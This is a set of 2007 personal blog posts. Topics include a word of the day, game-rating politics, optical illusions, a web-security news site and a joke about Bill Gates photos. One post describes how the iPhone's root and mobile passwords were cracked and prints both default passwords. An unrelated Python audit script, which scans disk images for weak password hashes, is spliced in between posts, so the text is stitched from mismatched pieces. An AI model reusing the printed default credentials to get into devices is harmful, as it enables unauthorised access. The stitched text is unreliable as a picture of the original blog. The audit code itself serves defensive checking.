yes, i agree, this does in fact score a -2 on the "coolness rating system"; then again, i have no shame. i encourage the four or five of you that actually read this blog to post in the comment section if you were able to use the given word on that given day. also, the comment section is an ideal medium to go about making fun of me for doing this. so without further ado, today's word is....
pervade/pervasive (verb) - to become spread throughout all parts. synonyms: diffuse; fill.
praise be to far from l33t0 at 08:55 0 cries of outrage
7.03.2007
iPhone root pw cracked
well it only took three days (which is longer than i expected) for the iPhone root pw to be cracked. it appears all iPhones ship with pw's for two specified accounts, one being 'mobile' and the other obviously being 'root'. hackers were able to extract a list of readable characters from a disk image (very cool) that had the user account names and corresponding encrypted pw's. using john (a popular pw cracker - 'john the ripper') the pw's were decrypted in 16 seconds. not 17, not 18, but 16 seconds.
'mobile' - alpine
'root' - dottie
currently the iPhone has no terminal access thus no way to use the accounts. it'll be interesting to see how this unfolds.
praise be to far from l33t0 at 14:46 0 cries of outrage
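An added audit check, not code from the post: it performs the "readable characters" step described above from the defender's side, scanning a raw disk image for passwd-style account records and flagging any account that ships with a usable password hash, with the hash scheme named so weak ones stand out. The sample image and its hash strings are constructed placeholders, not the real iPhone values.

```python
import re
from collections import namedtuple

# passwd(5)-style record name:hash:uid:gid:gecos:home:shell; fields are printable ASCII
_F = rb"[^:\x00-\x1f\x7f-\xff]*"
_PASSWD_RE = re.compile(rb"([A-Za-z_][A-Za-z0-9_-]{0,31}):(" + _F + rb"):(\d+):(\d+):("
                        + _F + rb"):(" + _F + rb"):(" + _F + rb")")
_PREFIXES = {"$1$": "md5-crypt", "$2": "bcrypt", "$5$": "sha256-crypt", "$6$": "sha512-crypt"}
WEAK_SCHEMES = {"des-crypt", "md5-crypt", "empty"}  # no password, or cheap to brute-force
AccountEntry = namedtuple("AccountEntry", "name hash_field uid hash_kind offset")

def classify_hash(field: str) -> str:
    """Name the scheme used in a passwd/shadow password field."""
    if field == "":
        return "empty"              # account can log in with no password at all
    if field in ("*", "!", "!!", "x"):
        return "locked-or-shadowed"  # not a hash: login disabled, or hash in a shadow file
    for prefix, kind in _PREFIXES.items():
        if field.startswith(prefix):
            return kind
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "des-crypt"          # traditional DES crypt: 8-char limit, very fast to crack
    return "unknown"

def find_embedded_accounts(image: bytes) -> list:
    """Scan raw bytes (the 'readable characters' step) for passwd-style records."""
    out = []
    for m in _PASSWD_RE.finditer(image):
        name, pw = m.group(1).decode(), m.group(2).decode()
        out.append(AccountEntry(name, pw, int(m.group(3)), classify_hash(pw), m.start()))
    return out

def audit_image(image: bytes) -> list:
    """One finding per account that ships with a usable, possibly weak, password."""
    findings = []
    for e in find_embedded_accounts(image):
        if e.hash_kind == "locked-or-shadowed":
            continue
        sev = "HIGH" if e.uid == 0 or e.hash_kind in WEAK_SCHEMES else "MEDIUM"
        findings.append(f"{sev}: '{e.name}' (uid {e.uid}) ships with a {e.hash_kind} "
                        f"password at offset {e.offset:#x}")
    return findings

# Constructed sample image: filler bytes around three records. The hash strings are
# made-up placeholders, not the real iPhone values.
SAMPLE_IMAGE = (b"\x00\x01\xff\x10" * 8
    + b"root:$1$abcdefgh$0123456789012345678901:0:0:System Administrator:/var/root:/bin/sh\n"
    + b"\x7f\x00\x00\x00mobile:AbCdEfGhIjKlM:501:501:Mobile User:/var/mobile:/bin/sh\n"
    + b"\x00" * 16 + b"daemon:*:1:1:System Services:/var/root:/usr/bin/false\n")
```

Running `audit_image` over a real image file's bytes before it ships turns the post's "three days to crack" into a build-time finding.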
sexually persuasive pictures of billy gates from 1983
so it has recently been disclosed that billy g and his boys at the evil empire have been using windows vista as a means to harvest user data. being the privacy advocate that i am, i knew something needed to be done...someone needed to impose on bill's privacy. upon a bit of snooping i was able to discover..hm, how shall we say, risqu'e photographs of the entrepreneur.
in this first one he's sprawled up on his desk staring at you with those big puppy eyes and suggestive smile.
in this next one bill appears to be going for the naughty in office "i'm gonna throw an old floppy disk at you pose". standard protocol for most male models in the early 80's.
praise be to far from l33t0 at 10:13 0 cries of outrage
put down your guns, pick up a laptop
first estonia, now russia…so it appears our good old friends from the cold war have begun to use cyber-warfare as a means to impair/take down a number of sites containing unfiltered political content.
praise be to far from l33t0 at 09:06 0 cries of outrage
7.02.2007
video games, politics, and a slice of lemon
the recent banning of Manhunt 2 in a number of countries and the adults only (AO) rating it received in the US has resulted in a number of questions regarding political intervention in the video game industry. one would assume the gaming industry placing a comprehensive content rating on a game (such as M-mature, T-teen, etc) and enabling the consumer to exhibit his/her own intuition in making a purchase would be sufficient..well a number of political figures feel differently. instead, they'd rather determine for YOU what YOU should be able to buy in this free market economy. lol, it's comedic.
well chalk one up for the gaming community. the times reports that michael d. gallagher has just recently been named president of the entertainment software association thus making him the gaming industry's chief lobbyist in washington. granted i hate political lobbyists of all sorts but i'll make an exception for a video game advocate pushing to maintain self-regulation in the video game industry. however, i wouldn't be surprised to see mr. gallagher get consumed with politics and money and let down myself and my fellow gaming brethren in some way. don't let me down michael or i might have to go Manhunt 2 on your ass.
praise be to far from l33t0 at 12:25 0 cries of outrage
the top 7 optical illusions that will f*** w/ ur head
happy monday all. to get your week started off on the right foot i figured i'd post something cool that i stumbled upon at work this morning. being monday morning and all, i'd rather surf the net aimlessly for stupid shit than contribute to my company in any regard (i have the "employee of the month" award in the bag). so without wasting any more time, here are some entertaining optical illusions for your viewing pleasure.
praise be to far from l33t0 at 08:56 0 cries of outrage
7.01.2007
planet-websecurity.org
christ1an, a contributing member to the web application security consortium mailing list, has just launched a new project, planet-websecurity.org. it's simply an up-to-date compilation of the most recent news in the web security field. thus far it appears to have an auspicious future, i suggest you all check it out.
praise be to far from l33t0 at 19:21 0 cries of outrage